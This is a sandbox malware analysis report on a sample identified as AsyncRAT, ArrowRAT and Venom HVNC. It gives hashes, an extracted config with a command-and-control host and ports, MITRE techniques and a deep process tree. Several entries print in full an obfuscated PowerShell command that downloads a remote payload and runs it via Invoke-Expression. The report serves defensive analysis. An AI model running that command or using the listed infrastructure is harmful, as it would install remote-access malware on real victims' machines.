arrowrat | 80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94

Analysis

max time kernel
1s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
24-11-2024 21:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ReBomb2.exe
Size

8.8MB
MD5

11f3d124b89d4c6a737f993442e15259
SHA1

290b45651633021d3afd4bdedf8f03c2c705cf11
SHA256

80d1631227d5b253b69f1004286c4562e765d54be593ac0b6ad0d34b35275f94
SHA512

43822db6a9dd226579c136e7049012714fb54ca4915fdf4b4ba92e2a72380b1b56de7a9a6cef79e9b62139e36244812955ca4bb2ff8991f03ef96f929d95b4f8
SSDEEP

196608:jnXFXAjanN0pJEFaSWADbBZpY8kqt0W9X41CoOw0bldnC9t:DFrypJEDpnpzkqt0kX41CtBdnC9t

Score

10^/10

arrowrat asyncrat venom clients venomhvnc discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

windows-services.linkpc.net:4449

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
true
install_file
System.exe
install_folder
%AppData%

aes.plain

Extracted

Family

arrowrat

Botnet

VenomHVNC

windows-services.linkpc.net:4448

Mutex

waDQmvKdS.exe

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Arrowrat family
arrowrat
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x001a00000002ab87-25.dat	family_asyncrat

Executes dropped EXE 9 IoCs

pid	Process
4972	ReBomb2.exe
3404	ClientH.exe
4236	venom.exe
2964	ReBomb2.exe
3532	ClientH.exe
3024	venom.exe
4932	ReBomb2.exe
4836	venom.exe
4580	ClientH.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
8640	powershell.exe
3340	powershell.exe
4932	powershell.exe
5572	powershell.exe
6008	powershell.exe
6168	powershell.exe
6396	powershell.exe
7624	powershell.exe
6884	powershell.exe
8672	powershell.exe
2800	powershell.exe
10460	powershell.exe
9532	powershell.exe
760	powershell.exe
6872	powershell.exe
6556	powershell.exe
8092	powershell.exe
1120	powershell.exe
4828	powershell.exe
3812	powershell.exe
8056	powershell.exe
9164	powershell.exe
9248	powershell.exe
7352	powershell.exe
4632	powershell.exe
5400	powershell.exe
7112	powershell.exe
3336	powershell.exe
8580	powershell.exe
10016	powershell.exe
6324	powershell.exe
5448	powershell.exe
1864	powershell.exe
6064	powershell.exe
7000	powershell.exe
8140	powershell.exe
6528	powershell.exe
6540	powershell.exe
7584	powershell.exe
2372	powershell.exe
1472	powershell.exe
5712	powershell.exe
6952	powershell.exe
6540	powershell.exe
2712	powershell.exe
1556	powershell.exe
6456	powershell.exe
4828	powershell.exe
9432	powershell.exe
8032	powershell.exe
5580	powershell.exe
10332	powershell.exe
7976	powershell.exe
9076	powershell.exe
9912	powershell.exe
11088	powershell.exe
4672	powershell.exe
9304	powershell.exe
7852	powershell.exe
8664	powershell.exe
5936	powershell.exe
8276	powershell.exe
6888	powershell.exe
8276	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3404 set thread context of 1132	3404	ClientH.exe	92

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ClientH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ClientH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ReBomb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ClientH.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
6500	timeout.exe
10852	timeout.exe
1748	timeout.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	ReBomb2.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings	ReBomb2.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2072	schtasks.exe
6628	schtasks.exe
6092	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3532	ClientH.exe
3404	ClientH.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3532	ClientH.exe
Token: SeDebugPrivilege	3404	ClientH.exe

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 4936 wrote to memory of 4972	4936	ReBomb2.exe	78
PID 4936 wrote to memory of 4972	4936	ReBomb2.exe	78
PID 4936 wrote to memory of 4972	4936	ReBomb2.exe	78
PID 4936 wrote to memory of 3404	4936	ReBomb2.exe	79
PID 4936 wrote to memory of 3404	4936	ReBomb2.exe	79
PID 4936 wrote to memory of 3404	4936	ReBomb2.exe	79
PID 4936 wrote to memory of 4236	4936	ReBomb2.exe	80
PID 4936 wrote to memory of 4236	4936	ReBomb2.exe	80
PID 4936 wrote to memory of 1268	4936	ReBomb2.exe	120
PID 4936 wrote to memory of 1268	4936	ReBomb2.exe	120
PID 4936 wrote to memory of 1268	4936	ReBomb2.exe	120
PID 4972 wrote to memory of 2964	4972	ReBomb2.exe	82
PID 4972 wrote to memory of 2964	4972	ReBomb2.exe	82
PID 4972 wrote to memory of 2964	4972	ReBomb2.exe	82
PID 4972 wrote to memory of 3532	4972	ReBomb2.exe	83
PID 4972 wrote to memory of 3532	4972	ReBomb2.exe	83
PID 4972 wrote to memory of 3532	4972	ReBomb2.exe	83
PID 4972 wrote to memory of 3024	4972	ReBomb2.exe	84
PID 4972 wrote to memory of 3024	4972	ReBomb2.exe	84
PID 4972 wrote to memory of 1748	4972	ReBomb2.exe	394
PID 4972 wrote to memory of 1748	4972	ReBomb2.exe	394
PID 4972 wrote to memory of 1748	4972	ReBomb2.exe	394
PID 2964 wrote to memory of 4932	2964	ReBomb2.exe	132
PID 2964 wrote to memory of 4932	2964	ReBomb2.exe	132
PID 2964 wrote to memory of 4932	2964	ReBomb2.exe	132
PID 2964 wrote to memory of 4580	2964	ReBomb2.exe	87
PID 2964 wrote to memory of 4580	2964	ReBomb2.exe	87
PID 2964 wrote to memory of 4580	2964	ReBomb2.exe	87
PID 2964 wrote to memory of 4836	2964	ReBomb2.exe	89
PID 2964 wrote to memory of 4836	2964	ReBomb2.exe	89
PID 3532 wrote to memory of 2456	3532	ClientH.exe	328
PID 3532 wrote to memory of 2456	3532	ClientH.exe	328
PID 3404 wrote to memory of 1072	3404	ClientH.exe	90
PID 3404 wrote to memory of 1072	3404	ClientH.exe	90
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3532 wrote to memory of 276	3532	ClientH.exe	91
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 3404 wrote to memory of 1132	3404	ClientH.exe	92
PID 1268 wrote to memory of 760	1268	WScript.exe	94
PID 1268 wrote to memory of 760	1268	WScript.exe	94
PID 1268 wrote to memory of 760	1268	WScript.exe	94

C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
"C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4936
- C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
  "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4972
- - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
    "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
      "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4932
    - - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        5⤵
        
        PID:2108
      - C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        6⤵
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        7⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        8⤵
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        9⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        10⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        11⤵
        
        PID:5588
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        12⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        13⤵
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        14⤵
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        15⤵
        
        PID:5380
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        16⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        17⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        18⤵
        
        PID:6868
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        19⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        20⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        21⤵
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        22⤵
        
        PID:6920
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        23⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        24⤵
        
        PID:7508
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        25⤵
        
        PID:2848
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        26⤵
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        27⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        28⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        29⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        30⤵
        
        PID:1264
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        31⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        32⤵
        
        PID:8244
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        33⤵
        
        PID:9192
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        34⤵
        
        PID:8824
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        35⤵
        
        PID:6216
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        36⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        37⤵
        
        PID:9240
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        38⤵
        
        PID:10180
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        39⤵
        
        PID:10312
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        40⤵
        
        PID:9372
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        41⤵
        
        PID:10596
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        42⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        43⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        44⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        45⤵
        
        PID:10324
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        46⤵
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        47⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ReBomb2.exe"
        48⤵
        
        PID:248
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        48⤵
        
        PID:8580
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        49⤵
        
        PID:9320
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        49⤵
        
        PID:7108
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        48⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        47⤵
        
        PID:6580
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        48⤵
        
        PID:6568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        48⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        47⤵
        
        PID:8052
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        47⤵
        
        PID:8144
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        46⤵
        
        PID:5240
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        47⤵
        
        PID:11216
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        47⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        46⤵
        
        PID:10516
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        46⤵
        
        PID:10684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9532
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        45⤵
        
        PID:7748
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        46⤵
        
        PID:7896
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        46⤵
        
        PID:5824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        46⤵
        
        PID:8380
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        45⤵
        
        PID:6136
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        45⤵
        
        PID:10920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        44⤵
        
        PID:11220
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        45⤵
        
        PID:6592
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        45⤵
        
        PID:9900
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        45⤵
        
        PID:5884
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        44⤵
        
        PID:10476
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        44⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7584
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        43⤵
        
        PID:11204
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        44⤵
        
        PID:11144
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        44⤵
        
        PID:10384
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        44⤵
        
        PID:7332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        44⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        43⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        43⤵
        
        PID:8380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        42⤵
        
        PID:8976
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        43⤵
        
        PID:1516
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        43⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        42⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        42⤵
        
        PID:1228
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6540
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        41⤵
        
        PID:5312
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        42⤵
        
        PID:10284
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        42⤵
        
        PID:10984
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        42⤵
        
        PID:9408
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        41⤵
        
        PID:7424
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        41⤵
        
        PID:7260
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
